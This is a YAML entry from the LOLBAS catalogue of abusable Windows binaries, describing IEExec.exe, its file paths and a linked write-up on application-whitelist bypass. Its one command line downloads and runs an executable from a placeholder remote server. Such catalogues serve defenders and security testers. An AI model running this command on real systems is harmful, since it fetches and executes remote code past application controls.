LOLBAS/yml/OSBinaries/Ieexec.yml

19 lines
476 B
YAML
Raw Normal View History

2018-06-09 00:15:06 +02:00
---
Name: IEExec.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: 'Executes bypass.exe from the remote server.'
Full Path:
- c:\windows\system32\ieexec.exe
- c:\windows\sysWOW64\ieexec.exe
Code Sample: []
Detection: []
Resources:
- https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Notes: Thanks to Casey Smith - @subtee